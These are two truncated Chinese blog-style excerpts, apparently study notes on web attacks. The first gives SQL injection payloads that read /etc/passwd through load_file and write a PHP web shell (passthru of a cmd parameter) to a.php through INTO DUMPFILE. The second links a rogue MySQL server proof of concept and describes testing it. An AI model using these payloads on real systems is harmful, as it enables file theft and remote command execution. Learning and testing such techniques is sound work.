上篇主要概述了查询一些常见表格的方法?这里在增加一些查询的方式 读取文件: 'union select null,load_file('/etc/passwd')--?? 写入文件 结合上面,我们可以写入一个文件在目标路径 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "a.php" -- 这里的?<?php passthru($_GET['cmd']); ?>为我们要执行的命令, INTODUMPPFILE为我们创建的一个文件a.php但是这里我们写入的地址明显是?网页默认存放的路径,这...
mysql协议中流程和go语言实现的恶意mysql服务器:https://blog.csdn.net/ls1120704214/article/details/88174003 poc :https://github.com/allyshka/Rogue-MySql-Server 简单的原理:http://aq.mk/index.php/archives/23/ 今天实验了好久,直到最后一次才成功,之前的几次什么都读取不到,搞了一个下午,到现在,没午睡,好困呀,写完睡觉去,晚上起来还要肝概率论和攻防世界 使用的mysql客户端:Navicat 我直接在物理机上实现这个过...